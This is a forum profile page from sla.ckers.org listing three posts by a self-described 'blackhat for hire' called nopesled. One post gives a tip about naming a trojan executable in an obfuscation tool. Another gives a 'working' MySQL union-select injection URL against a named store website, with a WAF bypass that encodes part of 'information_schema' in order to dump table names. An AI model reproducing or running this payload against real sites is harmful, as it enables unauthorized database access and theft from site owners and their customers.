Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 

Current Page: 1 of 1
Results 1 - 3 of 3
6 months ago
nopesled
Hello all, I'm an unprofessional pentester/blackhat for hire who's looking to share knowledge and expand my current social circle with other knowledgeable people in the field, power in numbers y'know? It's a pity this forum looks slightly dead for the current time, I hope that will change. Cheers, nopesled
Forum: Intro
6 months ago
nopesled
It's been a while since you've posted this, but if you're still wondering, I'm sure if you have the .exe in the same directory, you just need to use 'set EXENAME trojan.exe'.
Forum: Obfuscation
6 months ago
nopesled
This is indeed MySQL injection, you need to bypass the WAF first. Working Query: http://www.piemontfungo.com/store/index.php?prod=-1888+union+select+1,group_concat(0x0a,table_name),3,4,5,6,7,8,9,10,11,12+from+informa%54ion_schema.tables--
Forum: SQL and Code Injection
Current Page: 1 of 1